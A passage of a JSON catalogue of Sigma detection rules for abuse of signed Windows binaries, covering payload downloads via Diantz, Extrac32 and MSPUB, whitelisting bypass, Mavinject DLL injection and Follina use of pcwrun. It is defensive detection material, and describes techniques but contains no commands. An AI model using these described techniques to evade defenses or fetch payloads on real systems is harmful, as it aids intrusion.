], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "value": "Suspicious Diantz Alternate Data Stream Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_diantz_ads.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Very Possible" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", - "value": "Suspicious Diantz Download and Compress Into a CAB File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", - "value": "Xwizard DLL Sideloading", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], - "creation_date": "2021/09/20", - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Windows installed on non-C drive" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "uuid": "129966c9-de17-4334-a123-8b58172e664d", - "value": "Suspicious Dump64.exe Execution", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1460597833917251595", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_dump64.yml", - "author": "Austin Songer @austinsonger, Florian Roth", - "level": "high", - "falsepositive": [ - "Dump64.exe in other folders than the excluded one" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", - "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", - "value": "Monitoring Winget For LOLbin Execution", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2020/04/21", - "filename": "proc_creation_win_lolbin_execution_via_winget.yml", - "author": "Sreeman, Florian Roth, Frack113", - "level": "medium", - "falsepositive": [ - "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Extexport.exe loads dll and is execute from other folder the original path", - "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", - "value": "Suspicious Extexport Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_extexport.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Download or Copy file with Extrac32", - "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", - "value": "Suspicious Extrac32 Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_extrac32.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Extract data from cab file and hide it in an alternate data stream", - "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "value": "Suspicious Extrac32 Alternate Data Stream Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2021/11/26", - "filename": "proc_creation_win_lolbin_extrac32_ads.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", - "value": "Abusing Findstr for Defense Evasion", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_lolbin_findstr.yml", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrative findstr usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", - "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", - "value": "Use of Forfiles For Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/14", - "filename": "proc_creation_win_lolbin_forfiles.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", - "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", - "value": "Use of FSharp Interpreters", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", - "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Legitimate use by a software developer." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", - "value": "LOLBIN Execution Of The FTP.EXE Binary", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_lolbin_ftp.yml", - "author": "Victor Sergeev, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", - "uuid": "1e59c230-6670-45bf-83b0-98903780607e", - "value": "Gpscript Execution", - "meta": { - "refs": [ - "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", - "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/05/16", - "filename": "proc_creation_win_lolbin_gpscript.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate uses of logon scripts distributed via group policy" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", - "value": "Ie4uinit Lolbin Use From Invalid Path", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", - "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/05/07", - "filename": "proc_creation_win_lolbin_ie4uinit.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the IEExec utility to download payloads", - "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "value": "Abusing IEExec To Download Payloads", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" - ], - "tags": "No established tags", - "creation_date": "2022/05/16", - "filename": "proc_creation_win_lolbin_ieexec_download.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "value": "Ilasm Lolbin Use Compile C-Sharp", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", - "https://www.echotrail.io/insights/search/ilasm.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/05/07", - "filename": "proc_creation_win_lolbin_ilasm.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", - "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", - "value": "Suspicious Execution of InstallUtil To Download", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_installutil_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "value": "JSC Convert Javascript To Executable", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/05/02", - "filename": "proc_creation_win_lolbin_jsc.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "value": "Kavremover Dropped Binary LOLBIN Usage", - "meta": { - "refs": [ - "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/11/01", - "filename": "proc_creation_win_lolbin_kavremover.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", - "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", - "value": "Launch-VsDevShell.PS1 Proxy Execution", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535981653239255040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of the script by a developer" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", - "value": "Mavinject Inject DLL Into Running Process", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", - "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", - "https://twitter.com/gN3mes1s/status/941315826107510784", - "https://reaqta.com/2017/12/mavinject-microsoft-injector/", - "https://twitter.com/Hexacorn/status/776122138063409152", - "https://github.com/SigmaHQ/sigma/issues/3742", - "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" - ], - "creation_date": "2021/07/12", - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", - "value": "Use of Mftrace.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_lolbin_mftrace.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use for tracing purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "value": "Execute MSDT Via Answer File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2022/06/13", - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", - "value": "Download Arbitrary Files Via MSOHTMED.EXE", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_msohtmed_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "value": "Download Arbitrary Files Via MSPUB.EXE", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_mspub_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "value": "LOLBIN From Abnormal Drive", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://www.scythe.io/library/threat-emulation-qakbot", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" - ], - "tags": [ - "attack.t1218.001" - ], - "creation_date": "2022/01/25", - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "medium", - "falsepositive": [ - "Rare false positives could occur on servers with multiple drives." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", - "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/03/06", - "filename": "proc_creation_win_lolbin_offlinescannershell.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", - "value": "Use of OpenConsole", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1537563834478645252", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/16", - "filename": "proc_creation_win_lolbin_openconsole.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by an administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This is used as a LOLBIN for example to bypass application whitelisting.", - "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", - "value": "Use of Pcalua For Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/14", - "filename": "proc_creation_win_lolbin_pcalua.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", - "value": "Indirect Command Execution By Program Compatibility Wizard", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/991335019833708544", - "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_lolbin_pcwrun.yml", - "author": "A. Sungurov , oscd.community", - "level": "low", - "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", - "value": "Execute Pcwrun.EXE To Leverage Follina", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535663791362519040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2022/06/13", - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "value": "Use of PktMon.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1040" - ], - "creation_date": "2022/03/17", - "filename": "proc_creation_win_lolbin_pktmon.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", - "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", - "value": "Application Whitelisting Bypass via PresentationHost.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/01", - "filename": "proc_creation_win_lolbin_presentationhost.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", - "value": "Download Arbitrary Files Via PresentationHost.exe", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_presentationhost_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "value": "PrintBrm ZIP Creation of Extraction", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/05/02", - "filename": "proc_creation_win_lolbin_printbrm.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "value": "Pubprn.vbs Proxy Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ], - "creation_date": "2022/05/28", - "filename": "proc_creation_win_lolbin_pubprn.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", - "value": "DLL Execution via Rasautou.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://github.com/fireeye/DueDLLigence", - "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious execution of 